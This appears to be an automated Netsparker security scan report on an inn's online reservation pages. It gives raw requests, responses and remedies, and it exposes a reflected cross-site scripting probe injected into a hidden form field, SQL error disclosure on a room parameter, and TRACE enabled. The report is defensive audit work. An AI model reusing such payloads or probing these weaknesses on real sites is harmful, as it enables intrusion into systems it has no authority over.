target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>


<script>
function CheckDate()
{
d=form1.text1.value; //if none selected d = false
if (d=='') {
alert('Please enter a check-in date.');
form1.text1.focus();
return false ;
}

e=form1.text2.value; //if none selected d = false
if (e=='' || isNaN(e)) {
alert('Please enter a number under number of nights.');
form1.text2.focus();
return false ;
}

f= 0 + form1.text3.value; //if none selected d = false
if (f<1 || isNaN(f)) {
alert('Please enter a number under number of guests.');
form1.text3.focus();
return false ;
}
}
</script>

<form name="form1" action="res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" method="post" >

<div align="center"><br>
<img src='../db/381/webview//nav1.gif'><br><br>

<table width="400" id="box" align="center" cellspacing="1">
<tr>
<td height="30" class="boxoff" align="center"><span class="boxheader">Check Availability</span>
</td>
</tr>
<tr>
<td nowrap class="boxoff">
<table width="350" cellspacing="5" class="boxheader">
<tr>
<td width="190">Please Select A Check In Date:
<td width="160"><a name="dcdummy:27"><input name="text1" value="8/14/2011" size="12" onFocus="this.blur()"></a>&nbsp;<a href="javascript:void(0)" onclick="if(self.gfPop)gfPop.fPopCalendar(document.form1.text1);return false;"><img class="PopcalTrigger" align="absmiddle" src="../cal07/normal/calbtn.gif" width="34" height="22" border="0" alt=""></a>
<tr>
<td colspan="2" align="right" class="text10">(Use Calendar to select a date)
<tr>
<td>Enter Number of Nights:
<td><input type="text" name="text2" size="2" maxlength="2" value="">
<tr>
<td>Enter Number of Guests:
<td valign="top"><input type="text" name="text3" size="2" maxlength="2"
value='2'><tr><td colspan=2>Sorry, we do not allow pets.
</table>

</font></b> </p>
<p align="center">
<input type="submit" name="Submit" value="CHECK AVAILABILITY" onClick="return CheckDate()" class="formBtnb185">

<input type="BUTTON" onClick="location.href='res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C'" value="RETURN TO CHART" name="BUTTON" class="formBtnb185">

<br>
<br>
</p>
<input type="hidden" name="rnum" value="'"--></style></script><script>netsparker(0x0005B1)</script>">

<script language="javascript">
document.form1.text2.focus();
</script>

</td>
</tr>
</table>
<br>
<table class=boldtable width="430" border="0" cellspacing="0" cellpadding="3" align="center">
<tr>
<td>

</td>
</tr>
</table>
</div>
</form>

<div align="center">
<a class="linkssml" href="http://www.sarktech.com" target="_blank">Availability and Reservations Powered by SuperINN.com</a><br><br></div>
<TD
background="https://www.superinn.com/db/381/webview/right.jpg"
rowSpan=2><IMG height=426
src="https://www.superinn.com/db/381/webview/right.jpg"
width=6 border=0 name=right></TD>
<TD><IMG height=392
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/leftback.jpg"><IMG
height=34
src="https://www.superinn.com/db/381/webview/leftback.jpg"
width=16 border=0 name=leftback></TD>
<TD><IMG height=34
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=4
src="https://www.superinn.com/db/381/webview/bottomborder.jpg"
width=745 border=0 name=bottomborder></TD>
<TD><IMG height=4
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR></TBODY></TABLE>
<DIV align=center><BR>
<SCRIPT language=JavaScript>
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</SCRIPT>

<DIV align=center>
<P><SPAN class=bottomnav><A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/index.shtml">Home</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/rates.shtml">Rates</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/specials.shtml">Special Offers</A> ~ <A
target="_top" class=bottomnav href="http://www.hanoverhouseinn.com/rooms.shtml">Guest
Rooms</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/location.shtml">Location</A> ~ </SPAN><A
class=bottomnav
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;">Printable Brochure</A> <SPAN class=bottomnav>~ </SPAN><A
class=bottomnav href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
>Online Reservations</A> <SPAN class=bottomnav>~</SPAN> <A target="_top"
class=bottomnav href="http://www.twinoaksinn.net/">Twin Oaks Inn Home
Page</A><BR><IMG height=28 alt="The Hanvoer House Inn"
src="https://www.superinn.com/db/381/webview/footer2.jpg"
width=427> <BR><SPAN class=bottomnav>PO Box 2108, 28 Edgartown Road, Vineyard
Haven, Massachusetts 02568<BR></SPAN><SPAN class=bottomnavstrong>Reservations:
(800) 696-8633 ~ FAX - (508) 696-6099&nbsp;~ EMAIL: </SPAN>
<SCRIPT language=javascript class=bottomnavstrong>
<!--
var username="innkeeper";
var hostname="hanoverhouseinn.com";
var textstyle="bottomnavstrong";
var linktext= username + "@" + hostname;
document.write("<a href=" + "mail" + "to:" + username + "@" + hostname + "> <span class=" + textstyle+ ">" + linktext + "</span></a>")
//--></SCRIPT>
<SPAN class=bottomnavstrong><BR></SPAN><SPAN class=bottomnav>No smoking. No
pets. <BR><IMG height=36 alt="Located in Vineyard Haven on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/hleafdiv2.jpg"
width=380> <BR>Copyright �
<SCRIPT language=JavaScript><!--
function makeArray() {
for (i = 0; i<makeArray.arguments.length; i++)
this[i + 1] = makeArray.arguments[i];
}

var months = new makeArray('January','February','March',
'April','May','June','July','August','September',
'October','November','December');

var date = new Date();
var day = date.getDate();
var month = date.getMonth() + 1;
var yy = date.getYear();
var year = (yy < 1000) ? yy + 1900 : yy;

document.write(year);
//--></SCRIPT>
Hanover House all rights reserved.</SPAN>
</P></DIV></DIV><test main>
<iframe width=152 height=163 name="gToday:outlook:agenda.js" id="gToday:outlook:agenda.js" src="../cal07/webview/ipopeng.htm" scrolling="no" frameborder="0" style="visibility:visible; z-index:999; position:absolute; top:-500px; left:-500px;">
<LAYER name="gToday:outlook:agenda.js" src="../cal07/webview/npopeng.htm" background="../cal07/webview/npopeng.htm"> </LAYER>
</iframe>


</body>
</html>
Internal Server Error

Internal Server Error

1 TOTAL
LOW
CONFIRMED
1
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.

Impact

The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.

Remedy

Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp CONFIRMED

https://www.superinn.com/copy1/res_1_BNR.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1..

Request

GET /copy1/res_1_BNR.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:59 GMT
X-Powered-By: ASP.NET
Content-Length: 5407
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>
<div align="center"><br>
<img src='../db/381/webview//nav2.gif'><br>
<br>
</div>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'cdate'</font><p><font face="Arial" size=2>/copy1/res_1_BNR.asp</font><font face="Arial" size=2>, line 38</font>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /copy1/webview.asp

/copy1/webview.asp CONFIRMED

https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Identified Cookie

ASPSESSIONIDCADAAARA

Request

GET /copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:55 GMT
X-Powered-By: ASP.NET
Content-Length: 473
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA; path=/
Cache-control: private



<HTML>
<HEAD>
<title>Online Reservation</title>

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {}
</script>


</head>

<frameset rows='*' frameborder="NO" border="0" framespacing="0">

<frame name="mainFrame" src="ResMain.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C">

</frameset>
<noframes></body></noframes>
<test main>
</html>
Database Error Message

Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

Classification

OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
- /copy1/webroom.asp

/copy1/webroom.asp

https://www.superinn.com/copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Request

GET /copy1/webroom.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&Rnum= HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:01 GMT
X-Powered-By: ASP.NET
Content-Length: 526
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Room Description and Photos</title>
<style>
body {}
A
{
color: #FFFFFF;
TEXT-DECORATION: none
}
A:hover
{
color: #ffffff;
TEXT-DECORATION:none
}
</style>
</head>
<font face="Arial" size=2><p>Microsoft JET Database Engine</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Syntax error (missing operator) in query expression 'rnum='.</font><p><font face="Arial" size=2>/copy1/webroom.asp</font><font face="Arial" size=2>, line 307</font>
Programming Error Message

Programming Error Message

1 TOTAL
LOW
Netsparker identified a programming error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. Source code, stack trace, etc. type data may be disclosed. Most of these issues will be identified and reported separately by Netsparker.

Remedy

Do not provide error messages on production environments. Save error messages with a reference number to a backend storage such as a log, text file or database then show this number and a static user-friendly error message to the user.

Classification

OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
- /copy1/res_1_BNR.asp

/copy1/res_1_BNR.asp

https://www.superinn.com/copy1/res_1_BNR.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1..

Identified Error Message

Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>

Request

GET /copy1/res_1_BNR.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:59 GMT
X-Powered-By: ASP.NET
Content-Length: 5407
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>
<div align="center"><br>
<img src='../db/381/webview//nav2.gif'><br>
<br>
</div>
<font face="Arial" size=2><p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font><p><font face="Arial" size=2>Type mismatch: 'cdate'</font><p><font face="Arial" size=2>/copy1/res_1_BNR.asp</font><font face="Arial" size=2>, line 38</font>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

Classification

OWASP A6 CWE-16 WASC-14
- /copy1/webview.asp

/copy1/webview.asp CONFIRMED

https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Request

TRACE /copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:54 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 523


TRACE /copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C%7C%B2%A8%95J%9B%9D%A8%B4%BE%A8%93w%AE%8D%AF%BD%A7%C7%BF%A2y%84%93%A2%BBh HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Accept-Encoding: gzip, deflate

Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /copy1/Images/

/copy1/Images/ CONFIRMED

https://www.superinn.com/copy1/Images/

Request

GET /copy1/Images/ HTTP/1.1
Referer: https://www.superinn.com/copy1/Images/superinnsmall.gif
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=KNCOLOPACJONFJEFEPJIPOOA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:58 GMT
Connection: close
Content-Type: text/html
Content-Length: 172


<html><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /copy1/webview.asp

/copy1/webview.asp

https://www.superinn.com/copy1/webview.asp?crypt=%C2%BF%7Fp%5B%98%C2%BB%C2%B4%C2%B2%C2%A6%98b%7FkP%C..

Found E-mails

info@sarktech.com

Request

GET /copy1/webview.asp?crypt=%C2%BF%7Fp%5B%98%C2%BB%C2%B4%C2%B2%C2%A6%98b%7FkP%C3%81%C2%A8%C2%A6%9A%C3%81%7DX%B2%9A%B9%C7%AF%7C%7C%C2%B2%C2%A8%95J%9B%9D%C2%A8%C2%B4%C2%BE%C2%A8%93w%AE%8D%AF%BD%A7%C7%BFy%84%93%C2%A2%C2%BBh HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
